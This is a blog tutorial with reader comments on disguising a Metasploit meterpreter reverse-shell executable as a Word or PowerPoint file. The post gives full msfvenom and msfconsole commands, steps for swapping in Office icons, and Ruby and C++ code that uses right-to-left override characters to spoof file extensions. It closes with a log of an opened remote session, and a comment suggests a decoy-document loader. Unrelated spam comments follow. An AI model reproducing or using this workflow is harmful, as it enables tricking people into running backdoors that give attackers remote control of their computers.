Although the attack is not new, I could not find much information about good ways to create such files - so here is how I created a meterpreter payload and made it look like a normal file on Windows Vista/7.
During the process, I accessed the files both from Linux (metasploit, ruby) and Windows (Resource Hacker) using a Virtual Box machine with a shared folder. It should be possible to do everything on Windows only, but I did not test it.
[update 2011-11-04]
I just tested the examples with Windows 7 + Ruby 1.9.2. As a reader reported in the comments, the original examples do not work. Ruby 1.9.2 has improved unicode support, so we can use the \uXXXX codes directly - I added an alternative version of the commands.
[/update]
First, create a payload:
./msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST=192.168.1.1 LPORT=4444 >/tmp/demo.exe
To make the file look like our target format, we need to give the executable file an icon. Copy demo.exe to demo_doc.exe and demo_ppt.exe to create a Word and a Powerpoint template.
Now we need to find the correct icons for these filetypes. Start Resource Hacker (http://www.angusj.com/resourcehacker/) and open the Word executable holding the icons ("c:\program files\microsoft office\office14\wordicon.exe" on my system). Find a suitable icon group and note the corresponding values (resource name = 201 and language = 1033 in my case). Resource Hacker showed some error messages on my system, but it worked nonetheless.
Now open your payload (demo_doc.exe) file in Resource Hacker. Click "Action -> Add a new Resource". Open the file holding the icon (wordicon.exe in my case), set resource type to "ICON" and enter the collected values.
If you use an executable that already has an icon (e.g. when executing msfvenom with calc.exe as a template), use "Action -> Replace Icon".
Click "Add Resource" and save the file.
Repeat the process for the Powerpoint file. I used the file powerpnt.exe, resource name = 1301, language = 1033.
This is what you should see in Windows Explorer:
Theoretically, you could first rename the files before editing the icon resources. However, in my tests Resource hacker did not work correctly with the unicode filenames, so I recommend doing it in the described order.
The most used character for these tricks is "right-to-left override" (RTLO), in unicode: U+202E.
First, we need to convert this into an UTF-8 representation. You can do this by hand, like described here: http://home.tiscali.nl/t876506/utf8tbl.html, or you can just look it up: http://www.fileformat.info/info/unicode/char/202e/index.htm
So, U+202E converts to 0xE280AE.
With a simple RTLO, we can reverse the right side of the filename, so "cod.exe" looks like "exe.doc". We are quite limited here, as the name of the file needs to end on exe.
One good example I found was a file displayed as "SexyAlexe.ppt". The real name of this file is "SexyAl\xe2\x80\xaetpp.exe".
I used ruby to execute the rename commands, as the special characters sometimes cause problems if you try to execute them in a normal shell.
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\u202Etpp.exe")'
In Windows Explorer:
For more advanced file names, we need a second unicode character: U+202D = 0xE280AD, this one is called left-to-right override (LTRO).
Using this, the real file extension of the file can be placed anywhere in the displayed filename. We now also use .scr as extension to have more options.
# [RTLO]cod.yrammus_evituc[LTRO]2011.exe
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_doc.exe", "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_doc.exe", "\u202Ecod.yrammus_evituc\u202D2011.exe")'
# [RTLO]tpp.stohsnee[LTRO]funny.scr
# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "\xe2\x80\xaetpp.stohsnee\xe2\x80\xadfunny.scr")'
# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "\u202Etpp.stohsnee\u202Dfunny.scr")'
The filename is created in two parts, first writing from right to left and then from left to right, prepending the characters left of all those already written.
Result:
Open a metasploit console on the attacking machine:
./msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.1 msf exploit(handler) > exploitNow, open one of the created files on the target machine and you should get a meterpreter shell:
[*] Started reverse handler on 192.168.1.1:4444 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.100:54354) at Sun Oct 23 19:42:30 +0200 2011Of course, no document will be opened and some users might get suspicious. An advanced version of this attack would use an executable file that extracts an embedded document, opens it and then executes the reverse shell.
Posts
At first I thought this is going to be easy in VC++ 2010 "rename() or CopyFile()".
ReplyDeletebut...It isn't, dealing with UNICODE filenames in C turned out to be not straight forward.
Will really appreciate some help if someone managed to do this in C(++).
Great job.
ReplyDeleteBut sending "funny.screenshot.doc" with a Powerpoint icon is not that discrete :)
Anyways we both know that´s just a detail, great post, man.
I figured out how to do it in C++, using _wrename() instead of rename()
ReplyDeletecompile the following code and place test.exe in the same directory, then execute
//CODE
#include
int main(int argc, char* argv[])
{
int result;
const wchar_t* wide_oldname = L"test.exe";
wchar_t newname[] = L"Presentation_Al"
L"\u202E"
L"tpp.exe"; //RTOL Unicode, keep as is
result = _wrename( wide_oldname , newname );
if ( result == 0 )
puts ( "File successfully renamed" );
else
perror( "Error renaming file" );
return 0;
}
Total Commander shows the file name properly - as EXE file
Delete[RLO] Unicode character REALLY confuses windows :) "Try to read the error message"
ReplyDeletehttp://img560.imageshack.us/img560/5337/capture0022710201109555.jpg
@Julio:
ReplyDeletethanks for the hint - I just corrected that.
@Sherif:
This might be useful to create a loader program that extracts & opens a real office file and then executes a payload, thanks for sharing your code and the nice error message :)
I tried this on Windows 7 Professional x64 with Ruby ver 1.9.2. I tried to reproduce the example i.e. tried renaming a file from "demo_ppt.exe" to "SexyAlexe.ppt". But unexpectedly I get:
ReplyDelete"SexyAlΓÇxaeppt.exe"
when I execute:
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'
Why doesn't it work? Am I missing something?
The ruby being used in the blog post is under linux.
ReplyDeletethe windows version of ruby will output "THREE" charachters xe2 & x80 & xae, not the "xe280ae" single charachter.
this is maybe because of the cmd.exe?
under windows, just use the charmap.exe!!
Thanks. It seems to be fine now. :)
ReplyDeleteStrangely,
ReplyDelete"SexyAl\xe2\x80\xaetpp.exe"
produces "SexyAlexe.ppt" where as
"\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe"
produces
_summary.doc2011executive
on Backtrack 5 R1 (1.9.2). Same filename on Windows 7 x64.
Thoughts?
I also had the described problem when trying this on Windows 7 + Ruby 1.9.2.
ReplyDeleteRuby 1.9.2 has improved unicode support and uses different libraries on Windows than version 1.8.x.
It is possible to use the \uXXXX codes directly without converting them UTF-8 - I updated the examples in the post accordingly.
Software engineering can be defined as, "the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software." Another definition states, "an engineering discipline that is concerned with all aspects of software production."cheap Revit Architecture 2015
ReplyDeleteDo you have difficulty in writing an finance assignment? Here is the solution! Opt for our finance assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of finance assignment in students' life. fullassignment has a team with expertise and experience in finance assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
ReplyDeletehttps://fullassignment.com/services/finance-accounting-assignment-help
or reach out us on whatsapp - (+1) 669-271-4848
Do you have difficulty in writing an database assignment? Here is the solution! Opt for our database assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of database assignment in students' life. fullassignment has a team with expertise and experience in database assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
ReplyDeletehttps://fullassignment.com/services/finance-accounting-assignment-help
or reach out us on whatsapp - (+1) 669-271-4848
Nice & Informative Blog !
ReplyDeleteFinding adequate technical services for QuickBooks in this competitive world is quite challenging. Our team at QuickBooks Customer Support Number 1-877-948-5867 is always available to offer you the best technical help for QuickBooks.
I am reading a blog on this website for the first time and I would like to tell you that the quality of the content is up to the mark. It is very well written. Thank you so much for writing this blog and I will surely read all the blogs from now on. I also write blog and my latest blog is QuickBooks Error 6069
ReplyDeleteThis field is very much profitable and many professionals join it because they want to secure their future. If you are jobless, you should join this field and enjoy earning money. Dissertation writing services.
ReplyDeleteHey! What a wonderful blog. I loved your blog. QuickBooks is the best accounting software, however, it has lots of bugs like QuickBooks Error. To fix such issues, you can contact experts via QuickBooks Customer Service Phone Number
ReplyDeleteHey! Well-written blog. It is the best thing that I have read on the internet today. Moreover, if you are looking for the solution of QuickBooks Software, visit at QuickBooks Customer Service Number to get your issues resolved quickly.
ReplyDeleteWow, this is delightful reading.I'm glad I found it and got to read it. Great job on this content. I felt very good. Thanks for the great and unique info.Turkish Visit Visa, All citizens have to complete visa transit Turkey, go through the application process and pay the fee.
ReplyDeleteFantastic work.. I appreciate it. The travelers around the world who wish to travel to Azerbaijan need to apply for Azerbaijan evisa through e visa application. Get your visa with super fast processing with 24/7 assistance.
ReplyDeleteI want to always read your blogs. I love them Are you also searching for Nursing thesis writing services? we are the best solution for you. We are best known for delivering Nursing thesis writing services to students without having to break the bank
ReplyDeleteGreat work! It is the best thing that I have read on the internet today. Moreover, If you encounter any error while working on QuickBooks software , do contact this QuickBooks Customer Support (855)552-2543 number for quick assistance.
ReplyDeleteNice Blog, I have get enough information from your blog and I appreciate your way of writing.
ReplyDeleteThanks for everything Passfab iPhone unlocked registration code
Thanks for your efforts. This is really an inspiring and helpful article. There is no need to meet the Ukraine embassy specially to get a valid Ukraine visa. You can get a Ukraine-visa in 4 working days.
ReplyDeleteCoinbase support number | official site
ReplyDeletecoinbase support number | coinbase support number | coinbase support number | coinbase support number | coinbase support number |
Thanks for sharing good blog. Yoga have the power to change your mentality that how to think ,how to control your mind and how to use it. Yoga, yogainfo , yoga history, you reach us at
ReplyDeleteGood afternoon sir, Many people ask, How to apply Indian e visa? You can read about applying for an Indian e visa eta through our website.
ReplyDeleteNice article I was really impressed seeing this article, it was very interesting and it is very useful for me we provide best internship training in chennai
ReplyDelete